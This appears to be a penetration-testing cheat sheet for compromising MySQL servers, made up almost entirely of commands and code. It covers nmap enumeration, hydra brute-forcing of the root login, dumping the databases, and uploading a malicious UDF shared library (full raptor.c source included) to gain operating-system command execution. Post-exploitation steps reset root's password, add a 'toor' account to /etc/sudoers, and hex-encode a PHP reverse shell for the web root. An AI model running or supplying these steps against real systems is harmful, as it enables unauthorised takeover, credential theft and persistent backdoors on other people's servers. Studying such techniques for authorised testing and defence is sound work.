`` Scanning
~$ nmap -p 3306 -sV -Pn -vv --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-info,mysql-query,mysql-users,mysql-variables VAR_TARGET_HOST
-- NOTE: mysql-enum is unreliable
`` Password Bruteforcing
-- NOTE: -e nsr additionally tries an empty password, the login as password and the login reversed; -f stops at the first valid pair
-- NOTE: keep -t low - MySQL blocks a client host after max_connect_errors interrupted handshakes (cleared only by FLUSH HOSTS),
-- and 5.7+ may throttle failed logins via the connection_control plugin; raise -w / lower -t if connections start being refused
~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD mysql://VAR_TARGET_HOST
-- With a list of targets (one host per line); with -M, -f stops per host (-F would stop globally)
~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD -M VAR_TARGET_HOSTS mysql
`` Dump
-- NOTE: -p with no value prompts for the password (keeps it out of shell history); --single-transaction gives a consistent
-- snapshot for InnoDB only and is mutually exclusive with --lock-tables, so --lock-tables=false just makes that explicit
-- NOTE: dump.sql lands unencrypted on the local disk and may hold credentials/PII - store and dispose of it per the engagement rules
~$ mysqldump -h VAR_TARGET_HOST -u root -p --single-transaction --quick --lock-tables=false > dump.sql
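`` Extension upload
-- Preconditions: the FILE privilege, and the library must end up inside the directory reported by @@plugin_dir
-- (MySQL >= 5.0.67 refuses a SONAME with a path and loads only from there). @@secure_file_priv must be '' (unrestricted)
-- or point at plugin_dir itself: NULL disables INTO DUMPFILE entirely, any other directory makes the write fail
SELECT @@version, @@plugin_dir, @@secure_file_priv;
-- 0x7f454c... is a raw ELF (Linux) shared object as a hex literal, e.g. from: xxd -p lib_mysqludf_sys.so | tr -d '\n'
-- It MUST stay an unquoted 0x literal: a quoted '7f45...' string would write the hex text instead of the binary.
-- Match the server's architecture/bitness (a 64-bit mysqld will not load a 32-bit .so)
SELECT 0x7f454c...00000 INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';  -- substitute the @@plugin_dir value
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
-- confirm registration before calling it; dl must be the bare file name, never a path
SELECT name, ret, dl, type FROM mysql.func WHERE name = 'sys_eval';
-- ELF library => Linux target, so verify with a Unix command ('dir' only makes sense against a Windows build);
-- the command runs as the mysqld OS user, which is frequently 'mysql' rather than root
SELECT sys_eval('id');
-- clean up: DROP FUNCTION only removes the mysql.func row, the .so left in plugin_dir has to be deleted by hand
DROP FUNCTION sys_eval;
-- Unrelated helper: hex-encode a PHP reverse shell so it can be dropped the same way, e.g.
-- SELECT 0x<hex> INTO DUMPFILE '/var/www/html/shell.php' (same secure_file_priv and file-permission limits apply)
echo '<?php $sock=fsock[...]$pipes); ?>' | xxd -ps | tr -d '\n'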
`` raptor.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
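/*
 * Minimal copy of the MySQL UDF ABI so this builds without the server headers.
 * Only the leading struct members are declared; the real UDF_ARGS/UDF_INIT carry
 * further members after these, which is harmless because nothing here touches them.
 */
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args {
    unsigned int arg_count;     /* number of arguments */
    enum Item_result *arg_type; /* type of each argument; init may overwrite an entry to request coercion */
    char **args;                /* argument values; a NULL entry means SQL NULL */
    unsigned long *lengths;     /* byte length of each string argument (strings are not guaranteed NUL-terminated) */
    char *maybe_null;           /* 1 if the argument may be NULL */
} UDF_ARGS;
typedef struct st_udf_init {
    char maybe_null;            /* 1 if the function may return NULL */
    unsigned int decimals;      /* for real functions */
    unsigned long max_length;   /* for string functions */
    char *ptr;                  /* free pointer for per-statement data */
    char const_item;            /* 1 if the result is the same for every row, 0 otherwise */
} UDF_INIT;

/* Size of the message buffer MySQL hands to the init function (MYSQL_ERRMSG_SIZE). */
#define DO_CMD_MESSAGE_SIZE 512

/*
 * do_cmd(cmd): hand `cmd` to /bin/sh through system(3), running as the mysqld OS user.
 * Registered with: CREATE FUNCTION do_cmd RETURNS INTEGER SONAME 'raptor.so'
 *
 * Returns the raw status from system(3) (0 when the command exited 0), or -1 with
 * *error set when the argument is missing, not a string, or SQL NULL; in that case
 * nothing is executed and MySQL reports NULL for the row.
 * Declared long long because that is what MySQL expects from a RETURNS INTEGER UDF;
 * a plain int leaves the upper half of the 64-bit return register undefined.
 */
long long do_cmd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
    char *cmd;
    unsigned long len;
    long long status;

    (void)initid;
    (void)is_null;

    /* re-validate even though do_cmd_init already did: never let a NULL pointer reach system() */
    if (args->arg_count != 1 || args->arg_type[0] != STRING_RESULT || args->args[0] == NULL) {
        *error = 1;
        return -1;
    }

    /* copy using the explicit length: UDF string arguments are not guaranteed to be NUL-terminated */
    len = args->lengths[0];
    cmd = (char *)malloc(len + 1);
    if (cmd == NULL) {
        *error = 1;
        return -1;
    }
    memcpy(cmd, args->args[0], len);
    cmd[len] = '\0';

    status = (long long)system(cmd);
    free(cmd);
    return status;
}

/*
 * Called once per statement before do_cmd(). Rejects anything but exactly one
 * argument (the reason written to `message` becomes the SQL error text) and asks
 * the server to coerce that argument to a string so do_cmd() sees STRING_RESULT.
 * Returns 0 to proceed, 1 to abort the statement.
 */
char do_cmd_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
    if (args->arg_count != 1) {
        snprintf(message, DO_CMD_MESSAGE_SIZE, "do_cmd() takes exactly one argument");
        return 1;
    }
    args->arg_type[0] = STRING_RESULT;
    initid->maybe_null = 1;  /* do_cmd() yields NULL (via *error) when the argument is unusable */
    initid->const_item = 0;  /* the command must run for every row, not be evaluated once and cached */
    return 0;
}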
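-- build a position-independent shared object (-fPIC is required for a library on x86-64)
$ gcc -fPIC -g -c raptor.c
$ gcc -g -shared -Wl,-soname,raptor.so -o raptor.so raptor.o -lc
-- one continuous hex line (-c <file size> stops xxd from wrapping); equivalent: xxd -p raptor.so | tr -d '\n'
$ xxd -p -c `stat --format="%s" raptor.so` raptor.so
-- write the bytes into @@plugin_dir (needs FILE privilege and a secure_file_priv that allows that directory);
-- the hex MUST go in as an unquoted 0x literal - a quoted '...' string would dump the hex text, not the binary
mysql> SELECT 0x<output of above command> INTO DUMPFILE '/usr/lib/mysql/plugin/raptor.so';
mysql> CREATE FUNCTION do_cmd RETURNS INTEGER SONAME 'raptor.so';
-- do_cmd only returns the exit status; commands run as the mysqld OS user (often 'mysql', not root) - check first
mysql> SELECT do_cmd('id > /tmp/do_cmd.out');
-- destructive and noisy: resets root's password and may lock the real owner out; only with explicit approval
mysql> SELECT do_cmd("echo 'root:root'|chpasswd");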
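-- Legacy variant (raptor_udf2): the same UDF staged through a blob table and dropped in /usr/lib.
-- Only servers older than 5.0.67 (or with plugin_dir pointing there) load a library from /usr/lib;
-- on anything newer substitute the @@plugin_dir path below
gcc -g -c raptor_udf2.c
-- the linker flag is -Wl (lowercase L), not -W1
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
-- local passwordless root login (empty password, or auth_socket while running as the OS root user)
mysql -u root
mysql> use mysql;
mysql> create table foo(line blob);
-- load_file() needs the FILE privilege; the file must be readable by the mysqld user, inside secure_file_priv
-- (if set) and smaller than max_allowed_packet - /dev/shm is used because it is usually world-writable
mysql> insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
-- sanity check: dl must equal the file name given in the soname clause (ret 2 = INT_RESULT)
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system | 2   | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
-- these only escalate if mysqld itself runs as root (old or misconfigured installs); otherwise you get the mysql user
mysql> select do_system('adduser toor');
-- a malformed line in /etc/sudoers breaks sudo for every user; prefer a separate file under /etc/sudoers.d/
-- where it is included (Debian/Ubuntu default), and remove it when done
mysql> select do_system('echo "toor ALL=(ALL) ALL" >> /etc/sudoers');
mysql> select do_system('echo "toor:toor" | /usr/sbin/chpasswd');
-- clean up: the staging table and the function row, plus the .so on disk
mysql> drop function do_system;
mysql> drop table foo;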